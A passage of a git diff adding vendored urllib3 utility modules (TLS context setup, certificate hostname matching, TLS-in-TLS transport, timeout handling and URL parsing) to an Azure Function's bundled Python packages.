easily broken and is considered harmful and dangerous + options |= OP_NO_SSLv2 + # SSLv3 has several problems and is now dangerous + options |= OP_NO_SSLv3 + # Disable compression to prevent CRIME attacks for OpenSSL 1.0+ + # (issue #309) + options |= OP_NO_COMPRESSION + # TLSv1.2 only. Unless set explicitly, do not request tickets. + # This may save some bandwidth on wire, and although the ticket is encrypted, + # there is a risk associated with it being on wire, + # if the server is not rotating its ticketing keys properly. + options |= OP_NO_TICKET + + context.options |= options + + # Enable post-handshake authentication for TLS 1.3, see GH #1634. PHA is + # necessary for conditional client cert authentication with TLS 1.3. + # The attribute is None for OpenSSL <= 1.1.0 or does not exist in older + # versions of Python. We only enable on Python 3.7.4+ or if certificate + # verification is enabled to work around Python issue #37428 + # See: https://bugs.python.org/issue37428 + if (cert_reqs == ssl.CERT_REQUIRED or sys.version_info >= (3, 7, 4)) and getattr( + context, "post_handshake_auth", None + ) is not None: + context.post_handshake_auth = True + + def disable_check_hostname(): + if ( + getattr(context, "check_hostname", None) is not None + ): # Platform-specific: Python 3.2 + # We do our own verification, including fingerprints and alternative + # hostnames. So disable it here + context.check_hostname = False + + # The order of the below lines setting verify_mode and check_hostname + # matter due to safe-guards SSLContext has to prevent an SSLContext with + # check_hostname=True, verify_mode=NONE/OPTIONAL. This is made even more + # complex because we don't know whether PROTOCOL_TLS_CLIENT will be used + # or not so we don't know the initial state of the freshly created SSLContext. + if cert_reqs == ssl.CERT_REQUIRED: + context.verify_mode = cert_reqs + disable_check_hostname() + else: + disable_check_hostname() + context.verify_mode = cert_reqs + + # Enable logging of TLS session keys via defacto standard environment variable + # 'SSLKEYLOGFILE', if the feature is available (Python 3.8+). Skip empty values. + if hasattr(context, "keylog_filename"): + sslkeylogfile = os.environ.get("SSLKEYLOGFILE") + if sslkeylogfile: + context.keylog_filename = sslkeylogfile + + return context + + +def ssl_wrap_socket( + sock, + keyfile=None, + certfile=None, + cert_reqs=None, + ca_certs=None, + server_hostname=None, + ssl_version=None, + ciphers=None, + ssl_context=None, + ca_cert_dir=None, + key_password=None, + ca_cert_data=None, + tls_in_tls=False, +): + """ + All arguments except for server_hostname, ssl_context, and ca_cert_dir have + the same meaning as they do when using :func:`ssl.wrap_socket`. + + :param server_hostname: + When SNI is supported, the expected hostname of the certificate + :param ssl_context: + A pre-made :class:`SSLContext` object. If none is provided, one will + be created using :func:`create_urllib3_context`. + :param ciphers: + A string of ciphers we wish the client to support. + :param ca_cert_dir: + A directory containing CA certificates in multiple separate files, as + supported by OpenSSL's -CApath flag or the capath argument to + SSLContext.load_verify_locations(). + :param key_password: + Optional password if the keyfile is encrypted. + :param ca_cert_data: + Optional string containing CA certificates in PEM format suitable for + passing as the cadata parameter to SSLContext.load_verify_locations() + :param tls_in_tls: + Use SSLTransport to wrap the existing socket. + """ + context = ssl_context + if context is None: + # Note: This branch of code and all the variables in it are no longer + # used by urllib3 itself. We should consider deprecating and removing + # this code. + context = create_urllib3_context(ssl_version, cert_reqs, ciphers=ciphers) + + if ca_certs or ca_cert_dir or ca_cert_data: + try: + context.load_verify_locations(ca_certs, ca_cert_dir, ca_cert_data) + except (IOError, OSError) as e: + raise SSLError(e) + + elif ssl_context is None and hasattr(context, "load_default_certs"): + # try to load OS default certs; works well on Windows (require Python3.4+) + context.load_default_certs() + + # Attempt to detect if we get the goofy behavior of the + # keyfile being encrypted and OpenSSL asking for the + # passphrase via the terminal and instead error out. + if keyfile and key_password is None and _is_key_file_encrypted(keyfile): + raise SSLError("Client private key is encrypted, password is required") + + if certfile: + if key_password is None: + context.load_cert_chain(certfile, keyfile) + else: + context.load_cert_chain(certfile, keyfile, key_password) + + try: + if hasattr(context, "set_alpn_protocols"): + context.set_alpn_protocols(ALPN_PROTOCOLS) + except NotImplementedError: # Defensive: in CI, we always have set_alpn_protocols + pass + + # If we detect server_hostname is an IP address then the SNI + # extension should not be used according to RFC3546 Section 3.1 + use_sni_hostname = server_hostname and not is_ipaddress(server_hostname) + # SecureTransport uses server_hostname in certificate verification. + send_sni = (use_sni_hostname and HAS_SNI) or ( + IS_SECURETRANSPORT and server_hostname + ) + # Do not warn the user if server_hostname is an invalid SNI hostname. + if not HAS_SNI and use_sni_hostname: + warnings.warn( + "An HTTPS request has been made, but the SNI (Server Name " + "Indication) extension to TLS is not available on this platform. " + "This may cause the server to present an incorrect TLS " + "certificate, which can cause validation failures. You can upgrade to " + "a newer version of Python to solve this. For more information, see " + "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" + "#ssl-warnings", + SNIMissingWarning, + ) + + if send_sni: + ssl_sock = _ssl_wrap_socket_impl( + sock, context, tls_in_tls, server_hostname=server_hostname + ) + else: + ssl_sock = _ssl_wrap_socket_impl(sock, context, tls_in_tls) + return ssl_sock + + +def is_ipaddress(hostname): + """Detects whether the hostname given is an IPv4 or IPv6 address. + Also detects IPv6 addresses with Zone IDs. + + :param str hostname: Hostname to examine. + :return: True if the hostname is an IP address, False otherwise. + """ + if not six.PY2 and isinstance(hostname, bytes): + # IDN A-label bytes are ASCII compatible. + hostname = hostname.decode("ascii") + return bool(IPV4_RE.match(hostname) or BRACELESS_IPV6_ADDRZ_RE.match(hostname)) + + +def _is_key_file_encrypted(key_file): + """Detects if a key file is encrypted or not.""" + with open(key_file, "r") as f: + for line in f: + # Look for Proc-Type: 4,ENCRYPTED + if "ENCRYPTED" in line: + return True + + return False + + +def _ssl_wrap_socket_impl(sock, ssl_context, tls_in_tls, server_hostname=None): + if tls_in_tls: + if not SSLTransport: + # Import error, ssl is not available. + raise ProxySchemeUnsupported( + "TLS in TLS requires support for the 'ssl' module" + ) + + SSLTransport._validate_ssl_context_for_tls_in_tls(ssl_context) + return SSLTransport(sock, ssl_context, server_hostname) + + if server_hostname: + return ssl_context.wrap_socket(sock, server_hostname=server_hostname) + else: + return ssl_context.wrap_socket(sock) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssl_match_hostname.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssl_match_hostname.py new file mode 100644 index 0000000..d703a87 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssl_match_hostname.py @@ -0,0 +1,159 @@ +"""The match_hostname() function from Python 3.3.3, essential when using SSL.""" + +# Note: This file is under the PSF license as the code comes from the python +# stdlib. http://docs.python.org/3/license.html + +import re +import sys + +# ipaddress has been backported to 2.6+ in pypi. If it is installed on the +# system, use it to handle IPAddress ServerAltnames (this was added in +# python-3.5) otherwise only do DNS matching. This allows +# util.ssl_match_hostname to continue to be used in Python 2.7. +try: + import ipaddress +except ImportError: + ipaddress = None + +__version__ = "3.5.0.1" + + +class CertificateError(ValueError): + pass + + +def _dnsname_match(dn, hostname, max_wildcards=1): + """Matching according to RFC 6125, section 6.4.3 + + http://tools.ietf.org/html/rfc6125#section-6.4.3 + """ + pats = [] + if not dn: + return False + + # Ported from python3-syntax: + # leftmost, *remainder = dn.split(r'.') + parts = dn.split(r".") + leftmost = parts[0] + remainder = parts[1:] + + wildcards = leftmost.count("*") + if wildcards > max_wildcards: + # Issue #17980: avoid denials of service by refusing more + # than one wildcard per fragment. A survey of established + # policy among SSL implementations showed it to be a + # reasonable choice. + raise CertificateError( + "too many wildcards in certificate DNS name: " + repr(dn) + ) + + # speed up common case w/o wildcards + if not wildcards: + return dn.lower() == hostname.lower() + + # RFC 6125, section 6.4.3, subitem 1. + # The client SHOULD NOT attempt to match a presented identifier in which + # the wildcard character comprises a label other than the left-most label. + if leftmost == "*": + # When '*' is a fragment by itself, it matches a non-empty dotless + # fragment. + pats.append("[^.]+") + elif leftmost.startswith("xn--") or hostname.startswith("xn--"): + # RFC 6125, section 6.4.3, subitem 3. + # The client SHOULD NOT attempt to match a presented identifier + # where the wildcard character is embedded within an A-label or + # U-label of an internationalized domain name. + pats.append(re.escape(leftmost)) + else: + # Otherwise, '*' matches any dotless string, e.g. www* + pats.append(re.escape(leftmost).replace(r"\*", "[^.]*")) + + # add the remaining fragments, ignore any wildcards + for frag in remainder: + pats.append(re.escape(frag)) + + pat = re.compile(r"\A" + r"\.".join(pats) + r"\Z", re.IGNORECASE) + return pat.match(hostname) + + +def _to_unicode(obj): + if isinstance(obj, str) and sys.version_info < (3,): + # ignored flake8 # F821 to support python 2.7 function + obj = unicode(obj, encoding="ascii", errors="strict") # noqa: F821 + return obj + + +def _ipaddress_match(ipname, host_ip): + """Exact matching of IP addresses. + + RFC 6125 explicitly doesn't define an algorithm for this + (section 1.7.2 - "Out of Scope"). + """ + # OpenSSL may add a trailing newline to a subjectAltName's IP address + # Divergence from upstream: ipaddress can't handle byte str + ip = ipaddress.ip_address(_to_unicode(ipname).rstrip()) + return ip == host_ip + + +def match_hostname(cert, hostname): + """Verify that *cert* (in decoded format as returned by + SSLSocket.getpeercert()) matches the *hostname*. RFC 2818 and RFC 6125 + rules are followed, but IP addresses are not accepted for *hostname*. + + CertificateError is raised on failure. On success, the function + returns nothing. + """ + if not cert: + raise ValueError( + "empty or no certificate, match_hostname needs a " + "SSL socket or SSL context with either " + "CERT_OPTIONAL or CERT_REQUIRED" + ) + try: + # Divergence from upstream: ipaddress can't handle byte str + host_ip = ipaddress.ip_address(_to_unicode(hostname)) + except (UnicodeError, ValueError): + # ValueError: Not an IP address (common case) + # UnicodeError: Divergence from upstream: Have to deal with ipaddress not taking + # byte strings. addresses should be all ascii, so we consider it not + # an ipaddress in this case + host_ip = None + except AttributeError: + # Divergence from upstream: Make ipaddress library optional + if ipaddress is None: + host_ip = None + else: # Defensive + raise + dnsnames = [] + san = cert.get("subjectAltName", ()) + for key, value in san: + if key == "DNS": + if host_ip is None and _dnsname_match(value, hostname): + return + dnsnames.append(value) + elif key == "IP Address": + if host_ip is not None and _ipaddress_match(value, host_ip): + return + dnsnames.append(value) + if not dnsnames: + # The subject is only checked when there is no dNSName entry + # in subjectAltName + for sub in cert.get("subject", ()): + for key, value in sub: + # XXX according to RFC 2818, the most specific Common Name + # must be used. + if key == "commonName": + if _dnsname_match(value, hostname): + return + dnsnames.append(value) + if len(dnsnames) > 1: + raise CertificateError( + "hostname %r " + "doesn't match either of %s" % (hostname, ", ".join(map(repr, dnsnames))) + ) + elif len(dnsnames) == 1: + raise CertificateError("hostname %r doesn't match %r" % (hostname, dnsnames[0])) + else: + raise CertificateError( + "no appropriate commonName or subjectAltName fields were found" + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssltransport.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssltransport.py new file mode 100644 index 0000000..51e7be6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssltransport.py @@ -0,0 +1,221 @@ +import io +import socket +import ssl + +from ..exceptions import ProxySchemeUnsupported +from ..packages import six + +SSL_BLOCKSIZE = 16384 + + +class SSLTransport: + """ + The SSLTransport wraps an existing socket and establishes an SSL connection. + + Contrary to Python's implementation of SSLSocket, it allows you to chain + multiple TLS connections together. It's particularly useful if you need to + implement TLS within TLS. + + The class supports most of the socket API operations. + """ + + @staticmethod + def _validate_ssl_context_for_tls_in_tls(ssl_context): + """ + Raises a ProxySchemeUnsupported if the provided ssl_context can't be used + for TLS in TLS. + + The only requirement is that the ssl_context provides the 'wrap_bio' + methods. + """ + + if not hasattr(ssl_context, "wrap_bio"): + if six.PY2: + raise ProxySchemeUnsupported( + "TLS in TLS requires SSLContext.wrap_bio() which isn't " + "supported on Python 2" + ) + else: + raise ProxySchemeUnsupported( + "TLS in TLS requires SSLContext.wrap_bio() which isn't " + "available on non-native SSLContext" + ) + + def __init__( + self, socket, ssl_context, server_hostname=None, suppress_ragged_eofs=True + ): + """ + Create an SSLTransport around socket using the provided ssl_context. + """ + self.incoming = ssl.MemoryBIO() + self.outgoing = ssl.MemoryBIO() + + self.suppress_ragged_eofs = suppress_ragged_eofs + self.socket = socket + + self.sslobj = ssl_context.wrap_bio( + self.incoming, self.outgoing, server_hostname=server_hostname + ) + + # Perform initial handshake. + self._ssl_io_loop(self.sslobj.do_handshake) + + def __enter__(self): + return self + + def __exit__(self, *_): + self.close() + + def fileno(self): + return self.socket.fileno() + + def read(self, len=1024, buffer=None): + return self._wrap_ssl_read(len, buffer) + + def recv(self, len=1024, flags=0): + if flags != 0: + raise ValueError("non-zero flags not allowed in calls to recv") + return self._wrap_ssl_read(len) + + def recv_into(self, buffer, nbytes=None, flags=0): + if flags != 0: + raise ValueError("non-zero flags not allowed in calls to recv_into") + if buffer and (nbytes is None): + nbytes = len(buffer) + elif nbytes is None: + nbytes = 1024 + return self.read(nbytes, buffer) + + def sendall(self, data, flags=0): + if flags != 0: + raise ValueError("non-zero flags not allowed in calls to sendall") + count = 0 + with memoryview(data) as view, view.cast("B") as byte_view: + amount = len(byte_view) + while count < amount: + v = self.send(byte_view[count:]) + count += v + + def send(self, data, flags=0): + if flags != 0: + raise ValueError("non-zero flags not allowed in calls to send") + response = self._ssl_io_loop(self.sslobj.write, data) + return response + + def makefile( + self, mode="r", buffering=None, encoding=None, errors=None, newline=None + ): + """ + Python's httpclient uses makefile and buffered io when reading HTTP + messages and we need to support it. + + This is unfortunately a copy and paste of socket.py makefile with small + changes to point to the socket directly. + """ + if not set(mode) <= {"r", "w", "b"}: + raise ValueError("invalid mode %r (only r, w, b allowed)" % (mode,)) + + writing = "w" in mode + reading = "r" in mode or not writing + assert reading or writing + binary = "b" in mode + rawmode = "" + if reading: + rawmode += "r" + if writing: + rawmode += "w" + raw = socket.SocketIO(self, rawmode) + self.socket._io_refs += 1 + if buffering is None: + buffering = -1 + if buffering < 0: + buffering = io.DEFAULT_BUFFER_SIZE + if buffering == 0: + if not binary: + raise ValueError("unbuffered streams must be binary") + return raw + if reading and writing: + buffer = io.BufferedRWPair(raw, raw, buffering) + elif reading: + buffer = io.BufferedReader(raw, buffering) + else: + assert writing + buffer = io.BufferedWriter(raw, buffering) + if binary: + return buffer + text = io.TextIOWrapper(buffer, encoding, errors, newline) + text.mode = mode + return text + + def unwrap(self): + self._ssl_io_loop(self.sslobj.unwrap) + + def close(self): + self.socket.close() + + def getpeercert(self, binary_form=False): + return self.sslobj.getpeercert(binary_form) + + def version(self): + return self.sslobj.version() + + def cipher(self): + return self.sslobj.cipher() + + def selected_alpn_protocol(self): + return self.sslobj.selected_alpn_protocol() + + def selected_npn_protocol(self): + return self.sslobj.selected_npn_protocol() + + def shared_ciphers(self): + return self.sslobj.shared_ciphers() + + def compression(self): + return self.sslobj.compression() + + def settimeout(self, value): + self.socket.settimeout(value) + + def gettimeout(self): + return self.socket.gettimeout() + + def _decref_socketios(self): + self.socket._decref_socketios() + + def _wrap_ssl_read(self, len, buffer=None): + try: + return self._ssl_io_loop(self.sslobj.read, len, buffer) + except ssl.SSLError as e: + if e.errno == ssl.SSL_ERROR_EOF and self.suppress_ragged_eofs: + return 0 # eof, return 0. + else: + raise + + def _ssl_io_loop(self, func, *args): + """Performs an I/O loop between incoming/outgoing and the socket.""" + should_loop = True + ret = None + + while should_loop: + errno = None + try: + ret = func(*args) + except ssl.SSLError as e: + if e.errno not in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE): + # WANT_READ, and WANT_WRITE are expected, others are not. + raise e + errno = e.errno + + buf = self.outgoing.read() + self.socket.sendall(buf) + + if errno is None: + should_loop = False + elif errno == ssl.SSL_ERROR_WANT_READ: + buf = self.socket.recv(SSL_BLOCKSIZE) + if buf: + self.incoming.write(buf) + else: + self.incoming.write_eof() + return ret diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/timeout.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/timeout.py new file mode 100644 index 0000000..77a160e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/timeout.py @@ -0,0 +1,268 @@ +from __future__ import absolute_import + +import time + +# The default socket timeout, used by httplib to indicate that no timeout was +# specified by the user +from socket import _GLOBAL_DEFAULT_TIMEOUT + +from ..exceptions import TimeoutStateError + +# A sentinel value to indicate that no timeout was specified by the user in +# urllib3 +_Default = object() + + +# Use time.monotonic if available. +current_time = getattr(time, "monotonic", time.time) + + +class Timeout(object): + """Timeout configuration. + + Timeouts can be defined as a default for a pool: + + .. code-block:: python + + timeout = Timeout(connect=2.0, read=7.0) + http = PoolManager(timeout=timeout) + response = http.request('GET', 'http://example.com/') + + Or per-request (which overrides the default for the pool): + + .. code-block:: python + + response = http.request('GET', 'http://example.com/', timeout=Timeout(10)) + + Timeouts can be disabled by setting all the parameters to ``None``: + + .. code-block:: python + + no_timeout = Timeout(connect=None, read=None) + response = http.request('GET', 'http://example.com/, timeout=no_timeout) + + + :param total: + This combines the connect and read timeouts into one; the read timeout + will be set to the time leftover from the connect attempt. In the + event that both a connect timeout and a total are specified, or a read + timeout and a total are specified, the shorter timeout will be applied. + + Defaults to None. + + :type total: int, float, or None + + :param connect: + The maximum amount of time (in seconds) to wait for a connection + attempt to a server to succeed. Omitting the parameter will default the + connect timeout to the system default, probably `the global default + timeout in socket.py + `_. + None will set an infinite timeout for connection attempts. + + :type connect: int, float, or None + + :param read: + The maximum amount of time (in seconds) to wait between consecutive + read operations for a response from the server. Omitting the parameter + will default the read timeout to the system default, probably `the + global default timeout in socket.py + `_. + None will set an infinite timeout. + + :type read: int, float, or None + + .. note:: + + Many factors can affect the total amount of time for urllib3 to return + an HTTP response. + + For example, Python's DNS resolver does not obey the timeout specified + on the socket. Other factors that can affect total request time include + high CPU load, high swap, the program running at a low priority level, + or other behaviors. + + In addition, the read and total timeouts only measure the time between + read operations on the socket connecting the client and the server, + not the total amount of time for the request to return a complete + response. For most requests, the timeout is raised because the server + has not sent the first byte in the specified time. This is not always + the case; if a server streams one byte every fifteen seconds, a timeout + of 20 seconds will not trigger, even though the request will take + several minutes to complete. + + If your goal is to cut off any request after a set amount of wall clock + time, consider having a second "watcher" thread to cut off a slow + request. + """ + + #: A sentinel object representing the default timeout value + DEFAULT_TIMEOUT = _GLOBAL_DEFAULT_TIMEOUT + + def __init__(self, total=None, connect=_Default, read=_Default): + self._connect = self._validate_timeout(connect, "connect") + self._read = self._validate_timeout(read, "read") + self.total = self._validate_timeout(total, "total") + self._start_connect = None + + def __repr__(self): + return "%s(connect=%r, read=%r, total=%r)" % ( + type(self).__name__, + self._connect, + self._read, + self.total, + ) + + # __str__ provided for backwards compatibility + __str__ = __repr__ + + @classmethod + def _validate_timeout(cls, value, name): + """Check that a timeout attribute is valid. + + :param value: The timeout value to validate + :param name: The name of the timeout attribute to validate. This is + used to specify in error messages. + :return: The validated and casted version of the given value. + :raises ValueError: If it is a numeric value less than or equal to + zero, or the type is not an integer, float, or None. + """ + if value is _Default: + return cls.DEFAULT_TIMEOUT + + if value is None or value is cls.DEFAULT_TIMEOUT: + return value + + if isinstance(value, bool): + raise ValueError( + "Timeout cannot be a boolean value. It must " + "be an int, float or None." + ) + try: + float(value) + except (TypeError, ValueError): + raise ValueError( + "Timeout value %s was %s, but it must be an " + "int, float or None." % (name, value) + ) + + try: + if value <= 0: + raise ValueError( + "Attempted to set %s timeout to %s, but the " + "timeout cannot be set to a value less " + "than or equal to 0." % (name, value) + ) + except TypeError: + # Python 3 + raise ValueError( + "Timeout value %s was %s, but it must be an " + "int, float or None." % (name, value) + ) + + return value + + @classmethod + def from_float(cls, timeout): + """Create a new Timeout from a legacy timeout value. + + The timeout value used by httplib.py sets the same timeout on the + connect(), and recv() socket requests. This creates a :class:`Timeout` + object that sets the individual timeouts to the ``timeout`` value + passed to this function. + + :param timeout: The legacy timeout value. + :type timeout: integer, float, sentinel default object, or None + :return: Timeout object + :rtype: :class:`Timeout` + """ + return Timeout(read=timeout, connect=timeout) + + def clone(self): + """Create a copy of the timeout object + + Timeout properties are stored per-pool but each request needs a fresh + Timeout object to ensure each one has its own start/stop configured. + + :return: a copy of the timeout object + :rtype: :class:`Timeout` + """ + # We can't use copy.deepcopy because that will also create a new object + # for _GLOBAL_DEFAULT_TIMEOUT, which socket.py uses as a sentinel to + # detect the user default. + return Timeout(connect=self._connect, read=self._read, total=self.total) + + def start_connect(self): + """Start the timeout clock, used during a connect() attempt + + :raises urllib3.exceptions.TimeoutStateError: if you attempt + to start a timer that has been started already. + """ + if self._start_connect is not None: + raise TimeoutStateError("Timeout timer has already been started.") + self._start_connect = current_time() + return self._start_connect + + def get_connect_duration(self): + """Gets the time elapsed since the call to :meth:`start_connect`. + + :return: Elapsed time in seconds. + :rtype: float + :raises urllib3.exceptions.TimeoutStateError: if you attempt + to get duration for a timer that hasn't been started. + """ + if self._start_connect is None: + raise TimeoutStateError( + "Can't get connect duration for timer that has not started." + ) + return current_time() - self._start_connect + + @property + def connect_timeout(self): + """Get the value to use when setting a connection timeout. + + This will be a positive float or integer, the value None + (never timeout), or the default system timeout. + + :return: Connect timeout. + :rtype: int, float, :attr:`Timeout.DEFAULT_TIMEOUT` or None + """ + if self.total is None: + return self._connect + + if self._connect is None or self._connect is self.DEFAULT_TIMEOUT: + return self.total + + return min(self._connect, self.total) + + @property + def read_timeout(self): + """Get the value for the read timeout. + + This assumes some time has elapsed in the connection timeout and + computes the read timeout appropriately. + + If self.total is set, the read timeout is dependent on the amount of + time taken by the connect timeout. If the connection time has not been + established, a :exc:`~urllib3.exceptions.TimeoutStateError` will be + raised. + + :return: Value to use for the read timeout. + :rtype: int, float, :attr:`Timeout.DEFAULT_TIMEOUT` or None + :raises urllib3.exceptions.TimeoutStateError: If :meth:`start_connect` + has not yet been called on this object. + """ + if ( + self.total is not None + and self.total is not self.DEFAULT_TIMEOUT + and self._read is not None + and self._read is not self.DEFAULT_TIMEOUT + ): + # In case the connect timeout has not yet been established. + if self._start_connect is None: + return self._read + return max(0, min(self.total - self.get_connect_duration(), self._read)) + elif self.total is not None and self.total is not self.DEFAULT_TIMEOUT: + return max(0, self.total - self.get_connect_duration()) + else: + return self._read diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/url.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/url.py new file mode 100644 index 0000000..dc03d45 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/url.py @@ -0,0 +1,432 @@ +from __future__ import absolute_import + +import re +from collections import namedtuple + +from ..exceptions import LocationParseError +from ..packages import six + +url_attrs = ["scheme", "auth", "host", "port", "path", "query", "fragment"] + +# We only want to normalize urls with an HTTP(S) scheme. +# urllib3 infers URLs without a scheme (None) to be http. +NORMALIZABLE_SCHEMES = ("http", "https", None) + +# Almost all of these patterns were derived from the +# 'rfc3986' module: https://github.com/python-hyper/rfc3986 +PERCENT_RE = re.compile(r"%[a-fA-F0-9]{2}") +SCHEME_RE = re.compile(r"^(?:[a-zA-Z][a-zA-Z0-9+-]*:|/)") +URI_RE = re.compile( + r"^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?" + r"(?://([^\\/?#]*))?" + r"([^?#]*)" + r"(?:\?([^#]*))?" + r"(?:#(.*))?$", + re.UNICODE | re.DOTALL, +) + +IPV4_PAT = r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}" +HEX_PAT = "[0-9A-Fa-f]{1,4}" +LS32_PAT = "(?:{hex}:{hex}|{ipv4})".format(hex=HEX_PAT, ipv4=IPV4_PAT) +_subs = {"hex": HEX_PAT, "ls32": LS32_PAT} +_variations = [ + # 6( h16 ":" ) ls32 + "(?:%(hex)s:){6}%(ls32)s", + # "::" 5( h16 ":" ) ls32 + "::(?:%(hex)s:){5}%(ls32)s", + # [ h16 ] "::" 4( h16 ":" ) ls32 + "(?:%(hex)s)?::(?:%(hex)s:){4}%(ls32)s", + # [ *1( h16 ":" ) h16 ] "::" 3( h16 ":" ) ls32 + "(?:(?:%(hex)s:)?%(hex)s)?::(?:%(hex)s:){3}%(ls32)s", + # [ *2( h16 ":" ) h16 ] "::" 2( h16 ":" ) ls32 + "(?:(?:%(hex)s:){0,2}%(hex)s)?::(?:%(hex)s:){2}%(ls32)s", + # [ *3( h16 ":" ) h16 ] "::" h16 ":" ls32 + "(?:(?:%(hex)s:){0,3}%(hex)s)?::%(hex)s:%(ls32)s", + # [ *4( h16 ":" ) h16 ] "::" ls32 + "(?:(?:%(hex)s:){0,4}%(hex)s)?::%(ls32)s", + # [ *5( h16 ":" ) h16 ] "::" h16 + "(?:(?:%(hex)s:){0,5}%(hex)s)?::%(hex)s", + # [ *6( h16 ":" ) h16 ] "::" + "(?:(?:%(hex)s:){0,6}%(hex)s)?::", +] + +UNRESERVED_PAT = r"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._!\-~" +IPV6_PAT = "(?:" + "|".join([x % _subs for x in _variations]) + ")" +ZONE_ID_PAT = "(?:%25|%)(?:[" + UNRESERVED_PAT + "]|%[a-fA-F0-9]{2})+" +IPV6_ADDRZ_PAT = r"\[" + IPV6_PAT + r"(?:" + ZONE_ID_PAT + r")?\]" +REG_NAME_PAT = r"(?:[^\[\]%:/?#]|%[a-fA-F0-9]{2})*" +TARGET_RE = re.compile(r"^(/[^?#]*)(?:\?([^#]*))?(?:#.*)?$") + +IPV4_RE = re.compile("^" + IPV4_PAT + "$") +IPV6_RE = re.compile("^" + IPV6_PAT + "$") +IPV6_ADDRZ_RE = re.compile("^" + IPV6_ADDRZ_PAT + "$") +BRACELESS_IPV6_ADDRZ_RE = re.compile("^" + IPV6_ADDRZ_PAT[2:-2] + "$") +ZONE_ID_RE = re.compile("(" + ZONE_ID_PAT + r")\]$") + +_HOST_PORT_PAT = ("^(%s|%s|%s)(?::([0-9]{0,5}))?$") % ( + REG_NAME_PAT, + IPV4_PAT, + IPV6_ADDRZ_PAT, +) +_HOST_PORT_RE = re.compile(_HOST_PORT_PAT, re.UNICODE | re.DOTALL) + +UNRESERVED_CHARS = set( + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-~" +) +SUB_DELIM_CHARS = set("!$&'()*+,;=") +USERINFO_CHARS = UNRESERVED_CHARS | SUB_DELIM_CHARS | {":"} +PATH_CHARS = USERINFO_CHARS | {"@", "/"} +QUERY_CHARS = FRAGMENT_CHARS = PATH_CHARS | {"?"} + + +class Url(namedtuple("Url", url_attrs)): + """ + Data structure for representing an HTTP URL. Used as a return value for + :func:`parse_url`. Both the scheme and host are normalized as they are + both case-insensitive according to RFC 3986. + """ + + __slots__ = () + + def __new__( + cls, + scheme=None, + auth=None, + host=None, + port=None, + path=None, + query=None, + fragment=None, + ): + if path and not path.startswith("/"): + path = "/" + path + if scheme is not None: + scheme = scheme.lower() + return super(Url, cls).__new__( + cls, scheme, auth, host, port, path, query, fragment + ) + + @property + def hostname(self): + """For backwards-compatibility with urlparse. We're nice like that.""" + return self.host + + @property + def request_uri(self): + """Absolute path including the query string.""" + uri = self.path or "/" + + if self.query is not None: + uri += "?" + self.query + + return uri + + @property + def netloc(self): + """Network location including host and port""" + if self.port: + return "%s:%d" % (self.host, self.port) + return self.host + + @property + def url(self): + """ + Convert self into a url + + This function should more or less round-trip with :func:`.parse_url`. The + returned url may not be exactly the same as the url inputted to + :func:`.parse_url`, but it should be equivalent by the RFC (e.g., urls + with a blank port will have : removed). + + Example: :: + + >>> U = parse_url('http://google.com/mail/') + >>> U.url + 'http://google.com/mail/' + >>> Url('http', 'username:password', 'host.com', 80, + ... '/path', 'query', 'fragment').url + 'http://username:password@host.com:80/path?query#fragment' + """ + scheme, auth, host, port, path, query, fragment = self + url = u"" + + # We use "is not None" we want things to happen with empty strings (or 0 port) + if scheme is not None: + url += scheme + u"://" + if auth is not None: + url += auth + u"@" + if host is not None: + url += host + if port is not None: + url += u":" + str(port) + if path is not None: + url += path + if query is not None: + url += u"?" + query + if fragment is not None: + url += u"#" + fragment + + return url + + def __str__(self): + return self.url + + +def split_first(s, delims): + """ + .. deprecated:: 1.25 + + Given a string and an iterable of delimiters, split on the first found + delimiter. Return two split parts and the matched delimiter. + + If not found, then the first part is the full input string. + + Example:: + + >>> split_first('foo/bar?baz', '?/=') + ('foo', 'bar?baz', '/') + >>> split_first('foo/bar?baz', '123') + ('foo/bar?baz', '', None) + + Scales linearly with number of delims. Not ideal for large number of delims. + """ + min_idx = None + min_delim = None + for d in delims: + idx = s.find(d) + if idx < 0: + continue + + if min_idx is None or idx < min_idx: + min_idx = idx + min_delim = d + + if min_idx is None or min_idx < 0: + return s, "", None + + return s[:min_idx], s[min_idx + 1 :], min_delim + + +def _encode_invalid_chars(component, allowed_chars, encoding="utf-8"): + """Percent-encodes a URI component without reapplying + onto an already percent-encoded component. + """ + if component is None: + return component + + component = six.ensure_text(component) + + # Normalize existing percent-encoded bytes. + # Try to see if the component we're encoding is already percent-encoded + # so we can skip all '%' characters but still encode all others. + component, percent_encodings = PERCENT_RE.subn( + lambda match: match.group(0).upper(), component + ) + + uri_bytes = component.encode("utf-8", "surrogatepass") + is_percent_encoded = percent_encodings == uri_bytes.count(b"%") + encoded_component = bytearray() + + for i in range(0, len(uri_bytes)): + # Will return a single character bytestring on both Python 2 & 3 + byte = uri_bytes[i : i + 1] + byte_ord = ord(byte) + if (is_percent_encoded and byte == b"%") or ( + byte_ord < 128 and byte.decode() in allowed_chars + ): + encoded_component += byte + continue + encoded_component.extend(b"%" + (hex(byte_ord)[2:].encode().zfill(2).upper())) + + return encoded_component.decode(encoding) + + +def _remove_path_dot_segments(path): + # See http://tools.ietf.org/html/rfc3986#section-5.2.4 for pseudo-code + segments = path.split("/") # 